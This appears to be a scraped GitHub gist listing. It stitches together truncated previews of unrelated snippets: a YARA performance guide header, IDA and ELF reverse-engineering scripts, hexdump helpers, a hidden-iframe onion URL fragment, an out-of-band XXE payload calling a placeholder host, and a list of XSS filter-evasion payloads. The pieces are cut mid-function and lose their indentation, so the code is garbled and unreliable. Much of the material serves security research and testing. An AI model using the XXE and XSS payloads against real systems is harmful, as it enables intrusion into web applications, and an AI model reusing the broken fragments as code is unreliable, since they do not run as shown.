Zhang M1suzu

This Gist has been transfered into a Github Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

Revision 1.4, October 2020, applies to all YARA versions higher than 3.7

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	#!/usr/bin/env python
	"""
	Reconstitue an ELF file based on the ELF header in the *.b00
	file and the data in each of the other files.
	"""

	import sys, struct, glob, os

	def readfmt(f, fmt) :
	d = f.read(struct.calcsize(fmt))

	# Automatically find XOR/SHL/SHR routines from an executable
	# Uses IDAW (text IDA)
	# @bbaskin - brian @ thebaskins.com
	# While other, more powerful scripts like FindCrypt find known
	# algorithms this is used to find custom encoding or modified
	# encryption routines

	"""
	Script results:
	-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	def hexdump(src, length=16, sep='.'):
	"""Modified from: https://gist.github.com/7h3rAm/5603718
	"""
	FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or sep for x in range(256)])
	lines = []
	for c in xrange(0, len(src), length):
	chars = src[c:c+length]
	hex = ' '.join(["%02x" % ord(x) for x in chars])
	if len(hex) > 24:
	hex = "%s %s" % (hex[:24], hex[24:])

	//nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:

	<html>
	<body>
	<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
	</body>
	</html>

	<script>

	# hotkey_utils.py - bNull
	#
	# Some useful shortcuts for binding to hotkeys. Current output/hotkeys:
	#
	# [+] Bound make_dwords to Ctrl-Alt-D
	# [+] Bound make_cstrings to Ctrl-Alt-A
	# [+] Bound make_offset to Ctrl-Alt-O

	import idaapi
	import idc

	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>

	#!/usr/bin/env python3

	def hexdump(src, length=16, sep='.'):
	"""
	>>> print(hexdump('\x01\x02\x03\x04AAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBB'))
	00000000: 01 02 03 04 41 41 41 41 41 41 41 41 41 41 41 41 \|....AAAAAAAAAAAA\|
	00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 42 \|AAAAAAAAAAAAAABB\|
	00000020: 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 \|BBBBBBBBBBBBBBBB\|
	00000030: 42 42 42 42 42 42 42 42 \|BBBBBBBB\|
	>>>

	from idaapi import *
	from idc import *

	def get_stack_arg(arg, base='ebp'):
	# find the stack frame
	stack = GetFrame(here())
	size = GetStrucSize(stack)

	# figure out all of the variable names
	names = []